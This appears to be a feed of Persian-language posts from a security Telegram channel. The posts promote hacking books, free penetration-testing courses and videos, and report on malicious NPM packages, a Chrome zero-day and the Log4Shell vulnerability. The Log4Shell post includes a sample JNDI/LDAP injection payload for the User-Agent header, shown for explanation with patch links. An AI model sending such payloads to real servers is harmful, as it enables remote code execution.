دوستان لایک و کامنت یادتون نره
ممنون🌹👍

دوستانی که علاقمند به شاخه تست نفوذ وب یا باگ بانتی و برنامه نویسی امن وب اپلیکیشن هستن حتما پیج بالا رو فالو کنن
کلی نکات طلایی میگیم :)

📌 #کتاب Go Black Hat

📍سال: 2020
🧑‍💻نویسنده: No Starch Press
🇺🇸زبان: انگلیسی

👇🏿دانلود در پست بعدی👇🏿

🆔 @Vip_Security
🌐 www.VipSecurity.zone

🖊‏ سیستم و لپ تاپ مناسب برای هک و امنیت💻

مشاهده مطلب در سایت 👇👇👇

https://VipSecurity.zone/سیستم-و-لپ-تاپ-مناسب-برای-هک-و-امنیت/

💬نظرات خودتون رو در سایت تو بخش کامنت بگید🙂👌

🆔 @Vip_Security

📌 #کتاب Mastering Modern Web Penetration Testing

🇺🇸زبان:انگلیسی
👨‍💻نویسنده: Prakhar Prased

💢حتما پیشنهاد میشه برای دوستانی که در حوزه #تست_نفوذ_وب فعالیت میکنن مطالعه کنند

👇دانلود در پست بعدی👇

🆔 @Vip_Security
🌐 www.VipSecurity.zone

🖊باگ بانتی ( Bug Bounty ) چیست؟! 💻💵

مشاهده مطلب در سایت 👇👇👇

https://VipSecurity.zone/bug-bounty-چیست؟/

💬نظرات خودتون رو در سایت تو بخش کامنت بگید🙂👌

🆔 @Vip_Security

#اخبار #خبر
♨️ شناسایی 17 کتابخانه مخرب NPM که اطلاعات کاربران را روی سرور دیسکورد ذخیره می کرد

📌 17 بسته حاوی بدافزار در رجیستری پکیج های NPM کشف شده است که از طریق مخازن نرم افزار منبع باز مانند PyPi و RubyGems ارائه می شود.

آقای JFrog از شرکت DevOps گفت این کتابخانه ها هم اکنون از مخزن حذف شده اند ولی این کتابخانه ها برای دسترسی به رمز عبور و متغیر های محیطی (environment variables) از رایانه های کاربران و همچنین به دست آوردن کنترل کامل بر سیستم قربانی طراحی شده اند. این کتابخانه ها از پیام رسان دیسکورد جهت کنترل سیستم قربانیان استفاده می کنند.

💢لیست کتابخانه های مخرب :
prerequests-xcode (version 1.0.4)
discord-selfbot-v14 (version 12.0.3)
discord-lofy (version 11.5.1)
discordsystem (version 11.5.1)
discord-vilao (version 1.0.0)
fix-error (version 1.0.0)
wafer-bind (version 1.1.2)
...

منبع : https://thehackernews.com/2021/12/over-dozen-malicious-npm-packages.html


🆔 @Vip_Security
🌐 www.VipSecurity.zone

💢 آسیب پذیری خطرناک برای کتابخانه apache log4j

به تازگی آسیب پذیری کشف شده که میتونه به مهاجم قدرت اجرای کد از راه دور رو بده ( RCE )، این آسیب پذیری با شناسه CVE-2021-44228 برای کتابخانه Apache log4j هستش که بسیاری از سرویس های ابری مانند :Apple، Twitter،Steamوکلی سایت دیگر که از این کتابخانه استفاده میکنند
پیدا شده میتوانسته مورد بهره برداری قرار بگیره، از نسخه 2.0 تا 2.14.1 این آسیب پذیری وجود داره و در نسخه 2.15.0 رفع شده.

اما این آسیب پذیری مبتنی بر پروتکل HTTP و TCP میتونه به endpoint آسیب پذیر ارسال بشه و بهره برداری صورت بگیره، این آسیب پذیری در کتابخانه ای رخ داده که مامور Log مقادیر User Agent است و مهاجم میتونه پیلود خودش رو مبتنی بر پارامتر User Agent ارسال کرده و با wrapper پروتکل jndi دسترسی به ldap گرفته و ارتباطی رو مبتنی بر درگاهی ایجاد کنه.

Payload Example:

${jndi:ldap://127.0.0.1:1389/a}


https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java

Patch:
https://logging.apache.org/log4j/2.x/security.html

🆔 @Vip_Security
🌐 www.VipSecurity.zone

#خبر #اخبار
📌 کشف یک آسیب پذیری روز صفر در مرورگر گوگل کروم

❗️ شرکت گوگل 5 آسیب پذیری امنیتی را در مرورگر وب کروم خود برطرف کرده است که از اول سال تا امروز این هفدهمین نقطه ضعفی امنیتی در مرورگر گوگل کروم بوده که فاش شده است.

💢 این آسیب پذیر مربوط به یک باگ در موتورV8 JavaScript و WebAssembly است که شخص نفوذگر با استفاده از این آسیب پذیری می تواند داده های معتبر را تخریب کند و همچنین می تواند کد های دلخواه خودش را اجرا کند.

⭕️ شناسه این آسیب پذیری ‌CVE-2021-4102 است. این نقص امنیتی توسط یک شخص ناشناس کشف و گزارش شده است.

❌ در حال حاضر هیچ اکسپلویتی در مورد این آسیب پذیری در دنیای واقعی وجود ندارد اما شرکت گوگل اعلام کرده است که حتما مروگر خودتان را به آخرین نسخه آپدیت کنید، چون این آسیب پذیری یک نوع آسیب پذیری روز صفر محسوب می شود.

منبع : The Hacker News

🆔 @Vip_Security
🌐 www.VipSecurity.zone

#اخبار #خبر
📌آسیب پذیری دوم و جدید در log4j با شناسه CVE-2021-45046

💢بنیاد نرم‌افزار آپاچی (ASF) پس از اینکه پچ قبلی برای بهره‌برداری Log4Shell که اخیراً در نت پابلیک شده بود، که «در برخی از تنظیمات غیر پیش‌فرض ناقص» در نظر گرفته شد، اصلاح جدیدی را برای ابزار Log4j ارائه کرد. اما
دومین آسیب‌پذیری – که با شناسه CVE-2021-45046 شناخته می‌شود – دارای امتیاز 3.7 از حداکثر 10 در سیستم رتبه‌بندی CVSS است و تمامی نسخه‌های Log4j از 2.0-beta9 تا 2.12.1 و 2.13.0 تا 2.15.0 را تحت تأثیر قرار می‌دهد.

Patch :
https://logging.apache.org/log4j/2.x/security.html

🆔 @Vip_Security
🌐 www.VipSecurity.zone

🎞 تحلیل و اکسپلویت log4shell و روش رفع این آسیب پذیری

❗️برای مشاهده ویدیو حتما vpn خود را روشن کنید (ویدیو در چنل یوتوب است)

مشاهده مطلب/ویدیو در سایت 👇👇👇

🌐 https://VipSecurity.zone/log4shell-analysis/

🎥 https://www.youtube.com/watch?v=t181JpZIOJw

💬نظرات خودتون رو در سایت/چنل یوتوب تو بخش کامنت بگید🙂

🆔 @Vip_Security

🖊 آموزش نصب کالی لینوکس در اندروید (بدون روت) 📲💻

مشاهده مطلب در سایت 👇👇👇

https://VipSecurity.zone/nethunter

💬نظرات خودتون رو در سایت تو بخش کامنت بگید🙂👌

🆔 @Vip_Security

⁉️میدونستید حدود ۳ میلیارد اپلیکیشن تحت تاثیر این آسیب پذیری قرار گرفتند😧

تو این ویدیو ما این آسیب پذیری رو بررسی کردیم و به این سوالات شما پاسخ دادیم:

▪️این آسیب پذیری چگونه و چرا رخ داده است ؟
▪️چطور میتوان این آسیب پذیدی را اکسپلویت کرد؟
▪️چگونه جلوی این آسیب پذیری را بگیریم؟


حتما ویدیو رو مشاهده کنید و لایک و کامنت از یاد نره😁👍

🍉 دوره های آموزشی کاملا #رایگان ویژه یلدا

یلداتون پیشاپیش مبارک ☃️🍉

به مناسبت شب یلدا تیم VipSecurity دوره های زیر رو برای شما کاربران عزیز رایگان قرار داده است:

🔥 دوره آموزشی اکسپلویت نویسی با روبی
🔥 دوره آموزشی مبانی تست نفوذ وب
🔥 دوره آموزشی اسکریپت نویسی با پایتون برای هکر ها

📌تمامی دوره ها کاملا رایگان است و هم اکنون میتونید با مراجعه به آدرس زیر در این دوره ها شرکت کنید :

🌐 https://VipSecurity.zone/shop

ویدیو معرفی دوره مبانی تست نفوذ اصلاح گردید.✅👍
(دوستان میگفتن از دقیقه ۱۳ به بعد صدا قطع میشه که الان فایل آپدیت کردیم)

📌دوستانی که در فعال سازی ایمیل شون در سایت مشکل دارند میتونن با همان ایمیل به آدرس زیر

[email protected]

یک ایمیل ارسال کنند و ما مشکلشون رو رفع میکنیم✅